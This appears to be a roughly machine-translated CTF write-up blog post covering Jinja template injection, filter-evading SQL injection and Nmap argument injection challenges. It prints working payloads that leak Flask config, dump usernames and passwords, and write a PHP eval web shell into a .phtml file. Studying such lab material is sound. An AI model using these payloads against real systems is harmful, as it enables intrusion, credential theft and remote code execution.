当前位置:网站首页>Basic use of CTF web shrink template injection nmap
Basic use of CTF web shrink template injection nmap
2022-07-07 08:10:00 【_ s1mple】
[WesternCTF2018]shrine
import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') def shrine(shrine): def safe_jinja(s): s = s.replace('(', '').replace(')', '') blacklist = ['config', 'self'] return ''.join(['{ {% set {}=None%}}'.format(c) for c in blacklist]) + s return flask.render_template_string(safe_jinja(shrine)) if __name__ == '__main__': app.run(debug=True)
import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') def shrine(shrine): def safe_jinja(s): s = s.replace('(', '').replace(')', '') blacklist = ['config', 'self'] return ''.join(['{
{% set {}=None%}}'.format(c) for c in blacklist]) + s return flask.render_template_string(safe_jinja(shrine)) if __name__ == '__main__': app.run(debug=True)
Open the title, the source code looks like this It's not neat at all We need to modify it manually , After finishing
import flask
import os
app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')
def index():
return open(__file__).read()
@app.route('/shrine/')
def shrine(shrine):
def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
return ''.join(['{ {% set {}=None%}}'.format(c) for c in blacklist]) + s
return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__':
app.run(debug=True)
Code audit Two routes are given in the code , The first one is used to display the source code
The second route is /shrine/ Submit parameters under the path , Set... In the template { {}} The contents included are back-end variables ,
app.config['FLAG'] = os.environ.pop('FLAG')
app.config['FLAG'] = os.environ.pop('FLAG')
Indicates that a named FLAG Of config, It could be flag, If there's no filtering config, Sure {
{config}} You can see all app.config Content ,
return ''.join(['{
{% set {}=None%}}'.format(c) for c in blacklist]) + s
The above line of code traverses the blacklist and sets it to empty
For example, in this question config and self.dict
however Python There are also some built-in functions , such as url_for and get_flashed_messages
obtain 6
Under normal circumstances Will try to pass in config Or into self.dict
Insert picture description here
But what you get is none There's another one that doesn't echo
Use /shrine/{ {url_for.globals}}
notice current_app It means that at present app, Well, we're right now app Under the config
/shrine/{ {url_for.globals[‘current_app’].config}}
The second method :
get_flashed_messages
Before returning to Flask Pass through flash() List of incoming flash messages . Add a message represented by a string object to a message queue , And then by calling get_flashed_messages() Method take out ( Flash messages can only be retrieved once , The flash information will be cleared after it is removed ).
**/shrine/{
{get_flashed_messages.__globals__['current_app'].config}}**
obtain flag
[SWPU2019]Web1
First register After logging in, you can apply for an announcement
Enter... In the test 1; When Find out
Use my fuzz Dictionary explosion
The length is 321 Everything is filtered I found a lot of filtering 、
It is found that an error is reported
Go straight up payload
#group by Get the number of columns
-1'/**/group/**/by/**/22,'11
# View version
-1'/**/union/**/select/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
# Get table name
-1'/**/union/**/select/**/1,
(select/**/group_concat(table_name)/**/from/**/sys.schema_auto_increment_colum
ns/**/where/**/table_schema=schema()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
,19,20,21,'22
# Get username
-1'/**/union/**/select/**/1,
(select/**/group_concat(a)/**/from(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/sele
ct*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
# Get password
-1'/**/union/**/select/**/1,
(select/**/group_concat(b)/**/from(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/sele
ct*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
[ WANGDING cup 2020 Rosefinch formation ]Nmap
This topic is still very interesting Inspected nmap Use
-oN Standard preservation
-oX XML preservation
-oG Grep preservation
-oA Save to all formats
-append-output Add save file
ping 127.0.0.1
nmap Of -oG Command can realize the writing of code , Here is the structure payload
' <?php @eval($_POST["cmd"]);?> -oG H0ne.php '
But echo hacker That means it's blacklisted fuzz test Found filtering php
Baidu found <? It can be used <?php Go around
utilize phtml Instead of php The suffix
The final payload yes
' <?= @eval($_POST["cmd"]);?> -oG H0ne.phtml '
I found it uploaded
Connected by ant sword You can get flag
Get echo
The second method :
nmap also -oN function
nmap -oN H0ne.txt
structure :
’ -oN H0ne.txt ’
Found that the file was written successfully
And then write php In one sentence Just connect it
' -oN H0ne.phtml <?=eval($_POST['cmd']); ?> '
边栏推荐
- [untitled]
- 力扣(LeetCode)187. 重复的DNA序列(2022.07.06)
- Few shot Learning & meta learning: small sample learning principle and Siamese network structure (I)
- DNS server configuration
- QT learning 26 integrated example of layout management
- The largest 3 same digits in the string of leetcode simple question
- The simple problem of leetcode is to judge whether the number count of a number is equal to the value of the number
- Paddlepaddle 29 dynamically modify the network structure without model definition code (relu changes to prelu, conv2d changes to conv3d, 2D semantic segmentation model changes to 3D semantic segmentat
- Make LIVELINK's initial pose consistent with that of the mobile capture actor
- Interactive book delivery - signed version of Oracle DBA work notes
猜你喜欢
Hisense TV starts the developer mode
Excel import function of jeesite form page
Who has docker to install MySQL locally?
Quickly use Jacobo code coverage statistics
Dedecms collects content without writing rules
快解析内网穿透助力外贸管理行业应对多种挑战
让Livelink初始Pose与动捕演员一致
Explore dry goods! Apifox construction ideas
电池、电机技术受到很大关注,反而电控技术却很少被提及?
【数字IC验证快速入门】15、SystemVerilog学习之基本语法2(操作符、类型转换、循环、Task/Function...内含实践练习)
随机推荐
基于Pytorch 框架手动完成线性回归
Interactive book delivery - signed version of Oracle DBA work notes
Search for an element in a binary search tree (BST)
The legend about reading the configuration file under SRC
[quick start of Digital IC Verification] 17. Basic grammar of SystemVerilog learning 4 (randomization)
Myabtis_Plus
Bugku CTF daily one question chessboard with only black chess
Game attack and defense world reverse
央视太暖心了,手把手教你写HR最喜欢的简历
【数字IC验证快速入门】15、SystemVerilog学习之基本语法2(操作符、类型转换、循环、Task/Function...内含实践练习)
Content of string
互动送书-《Oracle DBA工作笔记》签名版
Leetcode 40: combined sum II
Notes on PHP penetration test topics
Leetcode 90: subset II
Introduction à l'objet blob
Avatary的LiveDriver试用体验
Linux server development, detailed explanation of redis related commands and their principles
Rust versus go (which is my preferred language?)
Blob 对象介绍